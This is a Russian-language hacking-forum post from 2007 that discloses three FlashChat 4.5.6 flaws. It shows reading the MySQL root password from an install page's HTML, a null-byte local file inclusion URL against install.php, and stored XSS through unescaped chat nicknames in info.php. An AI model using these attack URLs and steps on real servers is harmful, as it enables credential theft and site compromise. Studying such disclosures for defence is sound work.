ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Перезагрузить страницу FlashChat some bugz
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

FlashChat some bugz
  #1  
Старый 01.05.2007, 12:17
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию FlashChat some bugz
Здрасвуйте, сегодня я покажу несколько найденых уязвимостей в чате FlashChat v 4.5.6. Тестил на старой версии, т.к. не было возомжности потестить на новой.
Возможно баги существуют в новых версиях.

Найденное мною ранее: пасивная xss в движке чата

Итак приступим!
Часто бывает что админы не удаляют установочные файлы .
Если это так, то, возможно, мы увидим такой текст:

Цитата:
Welcome to FlashChat v 4.5.6

Security alert!
install.php, or the install_files folder, are still present on your server.
Please remove these files before continuing.
======================
Узнаём пароль на MySQL
======================

Перейдём ко второму шагу установки чата
Код:
http://server.omg.ru/chat/install.php?step=2
Увидим примерно такое:

Цитата:
FlashChat 4.5.6 Installer

Step 2: Database Configuration

........
Database Name: flashchat
Database User: root
Database Password: ****
.......

Пароль на MySQL выводиться в html-форме под звёздочками.

Код:
<INPUT type="password" size="40" name="password" value="<?php echo $dbpass ?>" <?php if($useCMS) echo 'disabled';?>>
смотрим html код:
Код:
<INPUT type="password" size="40" name="password" value="89f732r" >
в данном случае 89f732r - это и есть пароль, пользователь - root.

===================
Локальный инклудинГ
===================

Всё те же файлы установки...
Приведу кусок кода с файла install.php:

PHP код:
$step $_GET['step'];

if( ! $step || $step<|| $step>8
{
    $step 1;
}

include "./install_files/step_$step.php"

Код:
http://server.omg.ru/chat/install.php?step=2'
Ошибка, файл не найден

Код:
Warning: include(./install_files/step_2\'.php) [function.include]: failed to open stream: No such file or directory in \home\omg\htdocs\chat\install.php on line 18
Warning: include() [function.include]: Failed opening './install_files/step_2\'.php' for inclusion (include_path='.;C:\php5\pear') in \home\omg\htdocs\chat\install.php on line 18
Теперь, можно произвести локальный инклуд файлов,если это позволит php.

Код:
http://server.omg.ru/chat/install.php?step=2.php/../../index.php%00
откроет главную страницу чата

============
Активная xsS
============

Плохая проверка имён в файле info.php

PHP код:
<?php foreach($rooms as $room) { ?>
    <tr>
        <td><?php echo $room['id']?></td>
        <td><?php echo $room['name']?></td>
        <td><?php echo numusers($room['id'])?></td>
        <td><?php
        $users usersinroom($room['id']);
        foreach( $users as $user ) {
            echo $user['login'] . "<br>";
        }
        ?> </td>
    </tr>
<?php ?>
Переменная $user['login'] (и не только она) не фильтруеться перед выводом в браузер.
Если войти в чат с ником <h1>mda</h1>,то при обращении к файле info.php увидим наш текст

/me Goudini - 2007
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Flashchat !!! karabym Чаты 17 23.12.2006 04:26
flashchat меняем пароли Connor Чаты 1 18.11.2006 01:17
FlashChat v4.7.0 ZikZak Болталка 3 14.11.2006 05:34



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ